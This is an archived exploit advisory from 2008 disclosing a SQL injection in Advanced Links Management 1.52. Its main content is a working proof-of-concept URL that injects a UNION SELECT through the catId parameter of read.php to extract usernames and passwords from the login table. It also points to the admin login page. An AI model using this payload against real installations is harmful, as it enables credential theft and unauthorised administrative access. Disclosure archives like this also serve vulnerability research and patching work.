[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Advanced Links Management (ALM) 1.52 SQL Injection Vulnerability
# Published : 2008-05-10
# Author : His0k4
# Previous Title : Vortex CMS (index.php pageid) Blind SQL Injection Exploit
# Next Title : Ktools PhotoStore <= 3.5.2 Multiple SQL Injection Vulnerabilities


###################################################
[~] ALM - Advanced Links Management remote SQL injection exploit
[~] Script download : http://www.easy-script.com/scripts-dl/alm_v152.zip                                                                                                            
[~] Founder: His0k4 { ALGERIAN HACKER }
[~] Greetz : All friends & muslims HaCkErS...
[~] Contact: His0k4.hlm[at]gmail.com
[~] P.O.C :
---------------------
http://localhost/[script_path]/read.php?catId={SQL}
[~] Exemple :
http://localhost/[script_path]/read.php?catId=-1 UNION SELECT 1,concat(username,0x3a,password) FROM login--
---------------------
[~] Note:
    Admin login:  http://localhost/[script_path]/admin
---------------------
###############################################

# www.Syue.com [2008-05-10]